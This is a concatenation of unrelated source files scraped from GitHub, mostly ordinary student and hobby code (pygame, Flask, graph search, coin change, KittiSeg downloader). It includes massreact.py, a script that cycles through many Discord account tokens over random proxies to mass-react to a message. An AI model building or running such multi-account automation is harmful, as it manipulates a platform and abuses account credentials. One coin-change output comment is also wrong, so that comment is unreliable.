11.1)\")\nplt.savefig(dir_eps+\"plot_deltams_virial.png\",dpi=200)\n\n\n#\nos.system(\"rm -rf *last\")\n","repo_name":"toshikisaito1005/mycasa_scripts","sub_path":"mycasa_scripts_active/scripts_ts10_phangs_ulirg/fig06_stellarmass_vs_gmc.py","file_name":"fig06_stellarmass_vs_gmc.py","file_ext":"py","file_size_in_byte":10265,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"70506281129","text":"import requests\r\nimport random\r\n\r\ndef read_from_file(filename):\r\n with open(filename, 'r') as file:\r\n return file.read().strip().split('\\n')\r\n\r\ndef send_request_with_proxy(token, proxy, cookie, xsp, refer, messageid, guildid):\r\n url = \"https://discord.com/api/v9/channels/\" + guildid + \"/messages/\" + messageid + \"/reactions/%E2%9C%85/%40me?location=Message&type=0\"\r\n headers = {\r\n \"accept\": \"*/*\",\r\n \"accept-language\": \"de-DE,de;q=0.9,en-US;q=0.8,en;q=0.7\",\r\n \"authorization\": token,\r\n \"sec-fetch-dest\": \"empty\",\r\n \"sec-fetch-mode\": \"cors\",\r\n \"sec-fetch-site\": \"same-origin\",\r\n \"x-debug-options\": \"bugReporterEnabled\",\r\n \"x-discord-locale\": \"de\",\r\n \"x-discord-timezone\": \"Europe/Berlin\",\r\n \"x-super-properties\": xsp,\r\n \"cookie\": cookie,\r\n \"Referer\": refer,\r\n \"Referrer-Policy\": \"strict-origin-when-cross-origin\"\r\n }\r\n try:\r\n response = requests.get(url, headers=headers, proxies=proxy)\r\n print(f\"Token: {token}, Status Code: {response.status_code}\")\r\n except requests.exceptions.RequestException as e:\r\n print(f\"Token: {token}, Error: {e}\")\r\n\r\ndef main():\r\n token_file = input(\"Token file>>>\")\r\n proxy_file = input(\"Proxy file>>>\")\r\n 
guildiddsc = input(\"GuildID>>>\")\r\n msgiddsc = input(\"MessageID>>>\")\r\n cookiedsc = input(\"cookie>>>\")\r\n xspdsc = input(\"XSP>>>\")\r\n referdsc = input(\"Referer>>>\")\r\n tokens = read_from_file(token_file)\r\n proxies = read_from_file(proxy_file)\r\n\r\n proxy_list = [proxy.strip() for proxy in proxies]\r\n\r\n for token in tokens:\r\n proxy = random.choice(proxies)\r\n send_request_with_proxy(token, proxy, cookiedsc, xspdsc, referdsc, msgiddsc, guildiddsc)\r\n\r\nif __name__ == \"__main__\":\r\n main()\r\n","repo_name":"dvlq/discord-tools","sub_path":"massreact/massreact.py","file_name":"massreact.py","file_ext":"py","file_size_in_byte":1749,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"38083735460","text":"# Tuple Methods.\n\n# There is no direct method to operate on tuple. First we have to change the tuple to list. Then perform operations on list and after that convert that list to a tuple.\n\nnumbers = (1, 2, 3, 4, 5, 6, 7, 8, 9)\n\nnum = list(numbers)\nnum.append(10)\nnum.reverse()\nnum[0] = 0\nnumbers = tuple(num)\nprint(numbers)\n\n# There are some methods that we can apply to tuple.\n\n# Will return the no. of occurence of given number.\nnumbers.count(6)\n\n# Will return first occurence of given number.\nnumbers.index(4)\n","repo_name":"Himanshu22Soni/100-Days-Code-Python","sub_path":"Day 25.py","file_name":"Day 25.py","file_ext":"py","file_size_in_byte":512,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"10663260807","text":"\"\"\"File Class Definition for Mpala Tower Metadata.\"\"\"\nfrom . import db, DATA_FILES\nfrom variable import Variable\nimport xarray\nimport requests\n\nprogram_location = 'programs'\n\ndef convert_to_sec(num, units):\n \"\"\"Convert time units to seconds.\"\"\"\n if units.startswith(('Min', 'min')):\n out = int(num) * 60\n elif units.startswith(('ms', 'mS')):\n out = float(num) / 1000\n elif units.startswith(('s', 'S')):\n out = int(num)\n else:\n print('couldn\\'t parse units')\n return (num, units)\n return out\n\n\n# Files contained within Metadata:\nclass File(db.DynamicEmbeddedDocument):\n \"\"\"File object model defined for use in MongoEngine.\"\"\"\n\n source = db.StringField()\n logger = db.StringField()\n datafile = db.StringField(\n # choices=DATA_FILES\n )\n filename = db.StringField()\n frequency = db.FloatField()\n frequency_flag = db.StringField()\n timestep_count = db.IntField()\n date = db.DateTimeField()\n program_name = db.StringField()\n program_location = db.StringField()\n\n # Where to find the datalogger output for this file.\n # We read this file to find and analyze variables.\n file_location = db.StringField()\n\n # The File object contains a list of Variables:\n variables = db.EmbeddedDocumentListField(Variable)\n\n def get_program(self):\n \"\"\"Retrieve a program file from the Mpala Tower Dropbox listings.\"\"\"\n # Must use Dropbox to get program files.\n from dropbox import Dropbox\n from posixpath import join\n import os\n\n # Set up the Dropbox connection. 
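(Dropbox() takes an OAuth2 access token, read from the environment below.)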
Not sure how access_tokens will work\n access_token = os.environ.get('access_token')\n dropbox_dir = os.environ.get('dropbox_dir')\n client = Dropbox(access_token)\n\n # If this is our first time with this file, set the program name and\n # location.\n self.program_location = join(\n dropbox_dir,\n program_location,\n self.program_name\n )\n # Retrieve the REST object from Dropbox\n prog_link = client.files_get_temporary_link(self.program_location)\n response = requests.get(prog_link.link)\n # Put the program file contents into an array for parsing\n program_content = response.text\n # Send that stuff back.\n return program_content\n\n @staticmethod\n def get_programmed_frequency(program_content=None, datafile=None):\n \"\"\"Determine the frequency of data collection from the program file.\"\"\"\n lines = program_content\n i = 0\n k = 0\n interval = None\n dt = 'DataTable'\n di = 'DataInterval'\n ct = 'CallTable'\n for i in range(len(lines)):\n line = lines[i].lstrip()\n if line.startswith(dt) and datafile in line:\n k = i\n if line.startswith(di) and i <= (k + 2):\n interval = line.split(',')[1]\n units = line.split(',')[2]\n i += 1\n if interval is None:\n i = 0\n for i in range(len(lines)):\n line = lines[i].lstrip()\n if line.startswith('Scan'):\n interval_temp = line.split('(')[1].split(',')[0]\n units_temp = line.split(',')[1]\n k = i\n if line.startswith(ct) and datafile in line and i <= (k + 7):\n interval = interval_temp\n units = units_temp\n i += 1\n if interval is None:\n frequency_flag = 'could not find program interval'\n frequency = float('nan')\n timestep_count = int(0)\n return [frequency, frequency_flag, timestep_count]\n try:\n num = int(interval)\n except:\n for l in lines:\n line = l.lstrip()\n if line.startswith('Const ' + interval):\n a = line.split('=')[1]\n b = a.split()[0]\n num = int(b)\n frequency = convert_to_sec(num, units)\n timestep_count = int(24. * 60. * 60. / frequency)\n frequency_flag = 'found frequency'\n return [frequency, frequency_flag, timestep_count]\n\n @staticmethod\n def process_netcdf(netcdf=None):\n \"\"\"Process a netCDF file into a dataframe and summary.\"\"\"\n from . 
import static_attrs\n\n ds = xarray.Dataset()\n ds = xarray.open_dataset(\n netcdf,\n decode_cf=True,\n decode_times=True\n )\n df = ds.to_dataframe()\n\n # drop from df, columns that don't change with time\n exclude = [var for var in static_attrs if var in df.columns]\n df_var = df.drop(exclude, axis=1) # dropping vars like lat, lon\n\n # get some descriptive statistics on each of the variables\n df_summ = df_var.describe()\n return ds, df_summ\n\n def parse(self):\n \"\"\"Parse a netcdf file to extract metadata information.\"\"\"\n ds, df_summ = self.process_netcdf(netcdf=self.file_location)\n self.source = ds.attrs['source']\n self.logger = ds.attrs['logger']\n self.program_name = ds.attrs['program']\n self.datafile = ds.attrs['datafile']\n program_content = self.get_program()\n [\n self.frequency,\n self.frequency_flag,\n self.timestep_count\n ] = self.get_programmed_frequency(\n program_content=program_content,\n datafile=self.datafile,\n )\n for var in df_summ:\n self.variables.append(\n Variable.generate_variable(\n var=var,\n ds=ds[var],\n df=df_summ[var],\n ts=self.timestep_count\n )\n )\n return self\n\n @staticmethod\n def generate_fake():\n \"\"\"Generate a fake File object for testing and development.\"\"\"\n from random import choice\n from faker import Faker\n fake = Faker()\n this_file = File(\n datafile=choice(DATA_FILES),\n source=fake.word(),\n logger=fake.word(),\n filename=fake.word(),\n frequency=choice([.1, 60, 600, 1800]),\n variables=[Variable.generate_fake() for i in range(1, 10)]\n )\n return this_file\n","repo_name":"kcaylor/tower_metadata","sub_path":"app/models/file.py","file_name":"file.py","file_ext":"py","file_size_in_byte":6340,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"12525348859","text":"# given a target amount n and a list of distinct coin values, \n# whats the fewest coins needed to make the change amount\ndef coin_rec(target, coins):\n \n min_coins = target\n\n if target in coins:\n return 1\n \n else:\n # for every coin value that is <= my target value\n for i in coins:\n if i <= target:\n # add a coin count + recursive call\n num_coins = 1 + coin_rec(target-i, coins)\n if num_coins < min_coins:\n min_coins = num_coins\n \n\n return min_coins\n \n\nprint(coin_rec(13,[1,5, 10])) #=> 1","repo_name":"daniel19e/dsa_practice","sub_path":"recursion/coin_change.py","file_name":"coin_change.py","file_ext":"py","file_size_in_byte":607,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"20153572734","text":"import pygame\nfrom components.gui import draw_around_surface\n\npygame.mixer.pre_init(44100, 16, 2, 4096)\npygame.init()\n\nWIDTH, HEIGHT = 960, 560\n\nFPS = 30\n\n# general colours\nBLACK = ( 0, 0, 0)\nWHITE = (255, 255, 255)\nRED = (211, 0, 0)\nGREEN = ( 0, 150, 0)\nDGREEN = ( 0, 100, 0)\nBLUE = ( 0, 0, 211)\nLBLUE = (137, 207, 240)\nGREY = (201, 201, 201)\nLGREY = (231, 231, 231)\nDGREY = ( 50, 50, 50)\nLBROWN = (185, 122, 87)\nDBROWN = (159, 100, 64)\n\n# display window that is drawn to\nWIN = pygame.display.set_mode((WIDTH, HEIGHT))\npygame.display.set_caption(\"Time platformer\")\n\n# fonts\nFONT = lambda x: pygame.font.SysFont(\"consolas.ttf\", x)\nTITLEFONT = FONT(70)\n\n# tile property/ies\nTILE_SIZE = 40\n\n# file locations\nfrom os import path\nPATH_TO_ATLAS_IMAGE = path.join(\"assets\", \"images\", \"atlas.bmp\")\nPATH_TO_LEVELS = path.join(\"assets\", \"levels\", \"levels\")\n\n# handles all updates to the window\ndef 
draw(WIN, state, tile_space, debug_mode, texture_atlas, selected_texture, show_commands, player):\n # create blank canvas\n WIN.fill(BLACK)\n \n # draws the tile_space\n tile_space.draw(WIN)\n \n player.draw(WIN)\n \n # extra tools for the dev\n if debug_mode == True:\n text = FONT(20).render(state.get_state(), 1, WHITE)\n WIN.blit(text, (0, 0))\n \n # draw which \n if state.get_state() == \"editor mode\":\n \n # draws the box around the image\n border_width = 5\n padding = 10\n x = WIDTH - TILE_SIZE - border_width*2 - padding\n y = padding\n container = pygame.Rect(x, y, TILE_SIZE + border_width*2, TILE_SIZE + border_width*2)\n pygame.draw.rect(WIN, RED, container, border_width)\n \n # draws the texture selected inside the box\n if selected_texture != \"delete\":\n image = texture_atlas.get_texture(selected_texture)\n WIN.blit(image, (x + border_width, y + border_width))\n else:\n image = texture_atlas.get_texture(\"empty\")\n WIN.blit(image, (x + border_width, y + border_width))\n \n # shows commands\n if show_commands == False:\n padding = 10\n text = FONT(30).render(\"Press SPACE to show commands\", 1, WHITE)\n x = padding\n y = HEIGHT - text.get_height() - padding\n draw_around_surface(WIN, text, x, y, padding, BLACK, WHITE, 1)\n WIN.blit(text, (padding, HEIGHT - text.get_height() - padding))\n \n elif show_commands == True:\n padding = 10\n commands = \"E: Eraser\\nQ: Show empty cells\\nS: Save current edit\\nO: Open saved edit\\nC: Clear edit\\nG: Show gridlines\"\n text = FONT(30).render(commands, 1, WHITE)\n x = padding\n y = HEIGHT - text.get_height() - padding\n draw_around_surface(WIN, text, x, y, padding, BLACK, WHITE, 1)\n WIN.blit(text, (x, y))\n \n # updates the display to show the changes\n pygame.display.flip()\n\ndef main():\n clock = pygame.time.Clock()\n \n # remove unnecessary events from event list\n pygame.event.set_blocked(None)\n pygame.event.set_allowed([pygame.QUIT, pygame.KEYUP, pygame.KEYDOWN, pygame.MOUSEBUTTONDOWN, pygame.MOUSEBUTTONUP])\n #pygame.event.set_allowed(USEREVENTS)\n \n from components.state import State\n from components.textures import TextureAtlas\n from components.tile_space import TileSpace\n from components.player import Player\n \n # GAME VARIABLES\n state = State(\"start\")\n \n player_image = pygame.Surface((40, 40))\n player_image.fill(GREEN)\n player = Player(0, 0, player_image, 5, 1)\n \n # generates a tiling grid for the game\n tiling = [[(x, y) for y in range(0, HEIGHT, TILE_SIZE)] for x in range(0, WIDTH, TILE_SIZE)]\n # tiling produces this:\n # 0, 0 40, 0 ...\n # 40,40 80,40 ...\n # ...\n # \n # tiling[a][b] returns co-ordinates: (20*a, 20*b)\n \n texture_atlas = TextureAtlas(PATH_TO_ATLAS_IMAGE)\n tile_space = TileSpace(tiling, texture_atlas, TILE_SIZE)\n \n # EDITOR MODE\n selected_group = \"walls\"\n selected_texture = \"wall\"\n show_commands = False\n \n # DEBUG MODE\n debug_mode = True\n \n #initiates game loop\n run = 1\n while run:\n \n #ticks the clock\n clock.tick(FPS)\n\n #gets mouse position\n mouse = pygame.mouse.get_pos()\n \n #for everything that the user has inputted ...\n for event in pygame.event.get():\n\n #if the \"x\" button is pressed ...\n if event.type == pygame.QUIT:\n \n #save game with shelve?\n #\n\n #ends game loop\n run = False\n\n #terminates pygame\n pygame.quit()\n\n #terminates system\n import sys\n sys.exit()\n \n elif event.type == pygame.KEYDOWN:\n if state.get_state() == \"start\":\n if event.key == pygame.K_e: # temp\n state.set_state(\"editor mode\")\n \n elif state.get_state() == \"editor 
mode\":\n # hot_keys for selections\n if selected_group == \"walls\":\n if event.key == pygame.K_1:\n selected_texture = \"wall\"\n elif event.key == pygame.K_2:\n selected_texture = \"wall-middle\"\n elif event.key == pygame.K_3:\n selected_texture = \"wall-left\"\n elif event.key == pygame.K_4:\n selected_texture = \"wall-bottom\"\n elif event.key == pygame.K_5:\n selected_texture = \"wall-right\"\n elif event.key == pygame.K_6:\n selected_texture = \"wall-top\"\n elif event.key == pygame.K_7:\n selected_texture = \"wall-top-left\"\n elif event.key == pygame.K_8:\n selected_texture = \"wall-bottom-left\"\n elif event.key == pygame.K_9:\n selected_texture = \"wall-bottom-right\"\n elif event.key == pygame.K_0:\n selected_texture = \"wall-top-right\"\n \n if event.key == pygame.K_s:\n from pyautogui import prompt\n name = prompt(text='Name/number of level', title='Save current level' , default='')\n if name != None:\n tile_space.save_tiling(PATH_TO_LEVELS, name)\n \n elif event.key == pygame.K_o:\n from pyautogui import prompt\n name = prompt(text='Name/number of level', title='Open level' , default='')\n if name != None:\n tile_space.load_tiling(PATH_TO_LEVELS, name)\n \n # tools\n elif event.key == pygame.K_c:\n tile_space.empty()\n \n elif event.key == pygame.K_g:\n tile_space.toggle_gridlines()\n \n elif event.key == pygame.K_q:\n tile_space.toggle_show_empty_cells()\n \n elif event.key == pygame.K_e:\n selected_texture = \"delete\"\n \n elif event.key == pygame.K_SPACE:\n show_commands = not show_commands\n \n # temp\n elif event.key == pygame.K_t:\n state.set_state(\"game\")\n \n elif state.get_state() == \"game\":\n if event.key == pygame.K_SPACE:\n player.jump()\n \n if state.get_state() == \"editor mode\":\n mouse_inputs = pygame.mouse.get_pressed()\n if mouse_inputs[0]:\n tile = tile_space.collide_tile_point(mouse[0], mouse[1])\n if tile == None:\n pass\n elif selected_texture == \"delete\":\n tile.empty()\n else:\n tile(selected_texture)\n \n pressing = pygame.key.get_pressed()\n player.update(pressing, state, tile_space)\n \n draw(WIN, state, tile_space, debug_mode, texture_atlas, selected_texture, show_commands, player)\n\nmain()","repo_name":"Nahor-Nehc/Platformer-base","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":7461,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"17441361514","text":"# DFS 와 BFS\nfrom collections import deque\n# DFS\ndef dfs_recur(graph, node, visited):\n visited[node] = True #재귀이므로 visited 바로 넣음\n print(node, end=\" \")\n\n for nextn in graph[node]:\n if visited[nextn] == False: # 현재 노드의 새끼 노드를 재귀 처리\n dfs_recur(graph, nextn, visited)\n\ndef dfs(graph, n, start):\n visited=[False]*(n+1)\n dfs_recur(graph, start, visited)\n\n# BFS : 너비 우선 탐색\ndef bfs(graph,n, start):\n visited = [False]*(n+1) # visited 는 안에 생성!\n q = deque() # deque 는 빠르다 -> bfs는 큐를 사용\n q.append(start)\n visited[start] = True # visited 도 바로 넣기\n\n while bool(q): # 큐가 비어있지 않는 동안\n now = q.popleft() # 큐는 popleft() 사용한다\n print(now, end=\" \")\n for node in graph[now]: # 현재노드의 새끼노드를 처리\n if visited[node] == False:\n visited[node] = True\n q.append(node)\n\nn, m, v = map(int, input().split())\ngraph = [[] for _ in range(n+1)]\nfor _ in range(m):\n a,b = map(int, input().split())\n graph[a].append(b)\n graph[b].append(a)\n\nfor i in graph:\n i.sort()\n\ndfs(graph, n, v)\nprint()\nbfs(graph, n, 
v)","repo_name":"dodoyeon/SW_Academy","sub_path":"swtest_blog/bj_1260db.py","file_name":"bj_1260db.py","file_ext":"py","file_size_in_byte":1241,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"35085246257","text":"\nfrom app import app,db\nfrom flask import request\nfrom app.models.tables import Products,Orders\nfrom app.models.marshmallow import OrdersSchema\nimport uuid\n\nfrom app.models.decorators import fields_required,token_required,perfil_required\n\n\n@app.route('/makeOrder',methods=['POST'])\n@token_required()\n@perfil_required(\"CLIENTE\")\n@fields_required(['publicId_product','amount'],isList=True)\ndef make_order(user,fields):\n orderNumber = str(uuid.uuid4().int & (1<<30)-1)\n\n dbList = []\n for item in fields:\n publicId = str(uuid.uuid4())\n orde = Orders(publicId=publicId,publicId_product=item['publicId_product'],orderNumber=orderNumber,amount=item[\"amount\"],publicId_costumer=user.publicId)\n valid = orde.is__valid()\n if not valid[0]:\n return {\"status\":False,\"message\":valid[1]}\n dbList.append(orde)\n\n for item in dbList:\n db.session.add(item)\n\n db.session.commit()\n return {\"status\":True,\"message\":\"order made successfully!\",'orderNumber':orderNumber}\n\n@app.route('/getOrder',methods=['POST'])\n@token_required()\n@perfil_required(\"LOJA\")\n@fields_required(['orderNumber'])\ndef get_order(user,fields):\n\n sc = OrdersSchema()\n itens = Orders.query.filter_by(orderNumber = fields['orderNumber']).all()\n \n\n return {\"status\":True,\"message\":\"OK\",\"products\":[sc.dump(x) for x in itens]}\n","repo_name":"melquelima/ApiLojaVirtual","sub_path":"app/controllers/order.py","file_name":"order.py","file_ext":"py","file_size_in_byte":1358,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"26915657125","text":"import sys\r\nfrom PyQt4 import QtCore, QtGui\r\nfrom PyQt4.QtOpenGL import *\r\nfrom OpenGL.GL import *\r\n\r\nclass TemplateUI(QtGui.QWidget):\r\n\r\n def __init__(self, parent=None):\r\n super(TemplateUI, self).__init__(parent)\r\n self.initUi()\r\n\r\n def initUi(self):\r\n # Main layout\r\n mainLayout = QtGui.QVBoxLayout()\r\n butLabLayout = QtGui.QHBoxLayout()\r\n \r\n # QLabel\r\n self.label = QtGui.QLabel('Hit Him:\\t')\r\n butLabLayout.addWidget(self.label)\r\n \r\n # QComboBox\r\n self.comboBox = QtGui.QComboBox()\r\n comboList = ['pushButton', 'comboBox']\r\n self.comboBox.addItems(comboList)\r\n mainLayout.addWidget(self.comboBox)\r\n\r\n # QPushButton\r\n self.pushButton = QtGui.QPushButton(\"Hit Me!!!!!!!!\")\r\n butLabLayout.addWidget(self.pushButton)\r\n mainLayout.addLayout(butLabLayout)\r\n \r\n # QPlainTextEdit\r\n self.plainTextEdit = QtGui.QPlainTextEdit()\r\n mainLayout.addWidget(self.plainTextEdit)\r\n\r\n\r\n\r\n \r\n \r\n\r\n \r\n\r\n self.setLayout(mainLayout)\r\n self.setWindowTitle(\"Template\")\r\n\r\nif __name__ == '__main__':\r\n app = QtGui.QApplication(sys.argv)\r\n temp = TemplateUI()\r\n temp.show()\r\n help(app)\r\n app.exec_()","repo_name":"vipul-rathod/AppleTree","sub_path":"PyQt_Templates.py","file_name":"PyQt_Templates.py","file_ext":"py","file_size_in_byte":1397,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"9393486769","text":"#coding=utf-8\n\nimport time\nfrom common.base import Base\nfrom common.logger import logger as log\n\n\nclass PublishArticlePage(Base):\n\n qfzs_tab_loc = (\"xpath\", \"//*[@id='step1']/div[2]/a/span\") # 
定位“群发助手”\n pub_list_loc=(\"xpath\",\"//a[@class='subnav-hotspot'and @href='/market/promotion']\")#定位发布文章菜单\n pub_btn_loc=(\"xpath\",\"//span[contains(text(),'发布文章')and @class='ng-scope']\")#定位发布文章按钮\n title_loc = (\"xpath\", \"//*[@id='app']/div/div/market/layout/div/div/layout-body/main/section/div/promotion-add/div/div[1]/form/promotion-article/div/div[1]/inputcell/div/div/div[2]/input\") # 定位文章标题输入框\n #title_loc=(\"xpath\",\"//inputcell[@class='col-lg-10 ng-isolate-scope']\")#定位文章标题输入框\n cover_loc=(\"xpath\",\"//input[@name='imageUpload']\")#定位封面图片上传按钮\n #content_loc=(\"xpath\",\"//textarea[@id='ueditor_textarea_editorValue']\")\n content_loc=(\"xpath\",\"//iframe[@id='ueditor_1']\")#定位文章内容文本框\n save_loc=(\"xpath\",\"//span[contains(text(),'保存')]\")\n\n def main(self,title,coverpath,acontent):\n log.info(\"begin article page\")\n self.click(PublishArticlePage.qfzs_tab_loc)#点击群发助手\n time.sleep(5)\n self.click(PublishArticlePage.pub_list_loc)#点击发布文章菜单\n time.sleep(2)\n self.click(PublishArticlePage.pub_btn_loc)#点击发布文章按钮\n time.sleep(5)\n self.sendKeys(PublishArticlePage.title_loc,title)#输入文章标题\n time.sleep(2)\n self.sendKeys(PublishArticlePage.cover_loc,coverpath)#上传封面图片\n time.sleep(10)\n #js1 = \"document.documentElement.scrollTop=10000\"\n #self.driver.execute_script(js1)\n #self.driver.switch_to_frame(PublishArticlePage.content_loc)\n self.inputTextArea(None, acontent)\n #self.sendKeys(PublishArticlePage.content_loc,acontent)#输入文章内容\n time.sleep(2)\n self.click(PublishArticlePage.save_loc)#点击保存\n log.info(\"end article page\")\n\n\n\n","repo_name":"loveyshelly/yy","sub_path":"page/publish_article_page.py","file_name":"publish_article_page.py","file_ext":"py","file_size_in_byte":2074,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"31599283331","text":"#%% defined a list of possible words\nword_list = ['mango', 'banana', 'pear', 'apple', 'coconut']\n\n#%% choose a random word from list\nimport random\n\nword = random.choice(word_list)\nprint(word)\n\n#%% ask the user for the input\nguess = input('enter a single letter: ')\n\n\n# %% check that the input is a single character\nif guess.isalpha() and len(guess) == 1:\n print('Good guess!')\nelse:\n print('Oops! That is not a valid input.')\n","repo_name":"Yurishizu9/hangman","sub_path":"milestone_2.py","file_name":"milestone_2.py","file_ext":"py","file_size_in_byte":432,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"18138967219","text":"\"\"\"Download data relevant to train the KittiSeg model.\"\"\"\nfrom __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\n\nimport logging\nimport sys\nimport os\nimport subprocess\n\nimport zipfile\n\n\nfrom six.moves import urllib\nfrom shutil import copy2\n\nimport argparse\n\nlogging.basicConfig(format='%(asctime)s %(levelname)s %(message)s',\n level=logging.INFO,\n stream=sys.stdout)\n\nsys.path.insert(1, 'incl')\n\n# Please set kitti_data_url to the download link for the Kitti DATA.\n#\n# You can obtain by going to this website:\n# http://www.cvlibs.net/download.php?file=data_road.zip\n#\n# Replace 'http://kitti.is.tue.mpg.de/kitti/?????????.???' 
by the\n# correct URL.\n\n\nvgg_url = 'ftp://mi.eng.cam.ac.uk/pub/mttt2/models/vgg16.npy'\n\n\ndef get_pathes():\n \"\"\"\n Get location of `data_dir` and `run_dir'.\n\n Defaut is ./DATA and ./RUNS.\n Alternativly they can be set by the environoment variabels\n 'TV_DIR_DATA' and 'TV_DIR_RUNS'.\n \"\"\"\n\n if 'TV_DIR_DATA' in os.environ:\n data_dir = os.path.join(['hypes'], os.environ['TV_DIR_DATA'])\n else:\n data_dir = \"DATA\"\n\n if 'TV_DIR_RUNS' in os.environ:\n run_dir = os.path.join(['hypes'], os.environ['TV_DIR_DATA'])\n else:\n run_dir = \"RUNS\"\n\n return data_dir, run_dir\n\n\ndef download(url, dest_directory):\n filename = url.split('/')[-1]\n filepath = os.path.join(dest_directory, filename)\n\n logging.info(\"Download URL: {}\".format(url))\n logging.info(\"Download DIR: {}\".format(dest_directory))\n\n def _progress(count, block_size, total_size):\n prog = float(count * block_size) / float(total_size) * 100.0\n sys.stdout.write('\\r>> Downloading %s %.1f%%' %\n (filename, prog))\n sys.stdout.flush()\n\n filepath, _ = urllib.request.urlretrieve(url, filepath,\n reporthook=_progress)\n print()\n return filepath\n\n\ndef main():\n parser = argparse.ArgumentParser()\n parser.add_argument('--kitti_url', default='', type=str)\n args = parser.parse_args()\n\n kitti_data_url = args.kitti_url\n\n data_dir, run_dir = get_pathes()\n\n vgg_weights = os.path.join(data_dir, 'weights', 'vgg16.npy')\n\n if not os.path.exists(data_dir):\n os.makedirs(data_dir)\n\n # Download VGG DATA\n if not os.path.exists(vgg_weights):\n download_command = \"wget {} -P {}\".format(vgg_url, data_dir)\n logging.info(\"Downloading VGG weights.\")\n download(vgg_url, data_dir)\n else:\n logging.warning(\"File: {} exists.\".format(vgg_weights))\n logging.warning(\"Please delete to redownload VGG weights.\")\n\n data_road_zip = os.path.join(data_dir, 'data_road.zip')\n\n # Download KITTI DATA\n if not os.path.exists(data_road_zip):\n if kitti_data_url == '':\n logging.error(\"Data URL for Kitti Data not provided.\")\n url = \"http://www.cvlibs.net/download.php?file=data_road.zip\"\n logging.error(\"Please visit: {}\".format(url))\n logging.error(\"and request Kitti Download link.\")\n logging.error(\"Rerun scipt using\"\n \"'python download_data.py' --kitti_url [url]\")\n exit(1)\n if not kitti_data_url[-19:] == 'kitti/data_road.zip':\n logging.error(\"Wrong url.\")\n url = \"http://www.cvlibs.net/download.php?file=data_road.zip\"\n logging.error(\"Please visit: {}\".format(url))\n logging.error(\"and request Kitti Download link.\")\n logging.error(\"Rerun scipt using\"\n \"'python download_data.py' --kitti_url [url]\")\n exit(1)\n else:\n logging.info(\"Downloading Kitti Road Data.\")\n download(kitti_data_url, data_dir)\n\n # Extract and prepare KITTI DATA\n logging.info(\"Extracting kitti_road data.\")\n zipfile.ZipFile(data_road_zip, 'r').extractall(data_dir)\n kitti_road_dir = os.path.join(data_dir, 'data_road/')\n\n logging.info(\"Preparing kitti_road data.\")\n\n train_txt = \"data/train3.txt\"\n val_txt = \"data/val3.txt\"\n testing_txt = \"data/testing.txt\"\n copy2(train_txt, kitti_road_dir)\n copy2(val_txt, kitti_road_dir)\n copy2(testing_txt, kitti_road_dir)\n\n logging.info(\"All data have been downloaded successful.\")\n\n\nif __name__ == '__main__':\n 
main()\n","repo_name":"MarvinTeichmann/KittiSeg","sub_path":"download_data.py","file_name":"download_data.py","file_ext":"py","file_size_in_byte":4408,"program_lang":"python","lang":"en","doc_type":"code","stars":904,"dataset":"github-code","pt":"53"} +{"seq_id":"26897174198","text":"from typing import List\n\ndef spiralOrder(matrix: List[List[int]]) -> List[int]:\n res = []\n left, right = 0, len(matrix[0])\n top, bottom = 0, len(matrix)\n\n while left < right and top < bottom:\n # get every i in the top row\n for i in range(left, right):\n res.append(matrix[top][i])\n top += 1\n # get every i in the right col\n for i in range(top, bottom):\n res.append(matrix[i][right - 1])\n right -= 1\n if not (left < right and top < bottom):\n break\n # get every i in the bottom row\n for i in range(right - 1, left - 1, -1):\n res.append(matrix[bottom - 1][i])\n bottom -= 1\n # get every i in the left col\n for i in range(bottom - 1, top - 1, -1):\n res.append(matrix[i][left])\n left += 1\n\n return res\n\nmatrix = [[1,2,3],[4,5,6],[7,8,9]]\nprint(spiralOrder(matrix))\n\nmatrix = [[1,2,3,4],[5,6,7,8],[9,10,11,12]]\nprint(spiralOrder(matrix))\n\n\"\"\"\nこの関数 `spiralOrder` は、与えられた2次元行列 (matrix) の要素を螺旋状に読み取り、それらの要素を1次元のリストとして返します。\n\n**大まかな説明**:\n`spiralOrder` 関数は、行列の外周から内側に向かって、上の行、右の列、下の行、左の列の順に要素を読み取り���それを結果のリスト `res` に追加していきます。この操作を行列の全ての要素を読み取るまで繰り返します。\n\n**部分毎の説明**:\n\n1. `res = []`: 結果を格納する空のリストを初期化します。\n2. 初期値設定: \n - `left, right`: 行列の左端と右端を示すインデックスです。\n - `top, bottom`: 行列の上端と下端を示すインデックスです。\n3. `while left < right and top < bottom`: このループは、まだ読み取る要素が存在する限り続きます。\n4. 上の行の要素を読み取り:\n ```python\n for i in range(left, right):\n res.append(matrix[top][i])\n top += 1\n ```\n5. 右の列の要素を読み取り:\n ```python\n for i in range(top, bottom):\n res.append(matrix[i][right - 1])\n right -= 1\n ```\n6. 以下の条件 `if not (left < right and top < bottom):` は、行や列の要素を読み取った後に、まだ読み取る要素が残っているかどうかをチェックします。もし残っていなければ、ループを終了します。\n7. 下の行の要素を読み取り:\n ```python\n for i in range(right - 1, left - 1, -1):\n res.append(matrix[bottom - 1][i])\n bottom -= 1\n ```\n8. 左の列の要素を読み取り:\n ```python\n for i in range(bottom - 1, top - 1, -1):\n res.append(matrix[i][left])\n left += 1\n ```\n9. 
